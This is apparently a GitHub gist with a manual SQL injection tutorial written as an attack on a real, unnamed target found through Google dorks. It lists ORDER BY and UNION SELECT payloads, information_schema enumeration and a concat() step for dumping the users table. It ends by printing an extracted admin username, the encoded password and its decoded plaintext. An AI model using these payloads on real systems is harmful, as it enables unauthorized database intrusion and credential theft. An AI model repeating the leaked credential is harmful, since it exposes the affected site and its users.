Created
December 10, 2018 17:09
-
-
Save ProgramFilesx86/6a6b7b55866b75ac8fa66de4e96f85a7 to your computer and use it in GitHub Desktop.
Mynoodmanualsqlinjec
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
1= check vul (using google dorks of course) | |
so i found a target and i'll excute on it | |
we'll check it by adding 'or' | |
2= order injections { | |
+order+by+1 | |
order by 1 | |
+order+by+1-- | |
} so we will add number from 1 to 100 to guess number of the vulnerable tables | |
the error message we be seems like Unknown numbers of columns or sum like this | |
so in the number of 7 shown the error msg so the numbers of the tables is 6 | |
3= union injections (table_name from information_schema.tables && column_name,3 from information_schema.columns where table_name='users') { | |
we'll inject those codes | |
union select 1,2,3,4,5,6 | |
union all select 1,2,3,4,5,6 | |
union select 1,2,3,4,5,6-- | |
+union+select 1,2,3,4,5,6 | |
+union+all+select 1,2,3,4,5,6 | |
to show us the vulnerable columns | |
so you see the vulnerable columns are 4 & 6 | |
we'll inject in them | |
so the purpose of tis injection is to know the names of the tables in the database | |
there's a table name with 'users' whoch we'll find users data on it | |
now to know the data on this table we'll inject | |
folow me | |
} | |
4= using concat(1st ,0x3a, 2nd ,0x3a, ...) this is the final step to extract the data | |
we write concat(1st column , 2nd colum , 3rd column) | |
so you we extract the data with id 1 and username admin and password TSphIWx1QDUla0BwIUw= | |
the password is hashed by base64 (perhapse) | |
so the pwd is M*a!lu@5%k@p!L |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment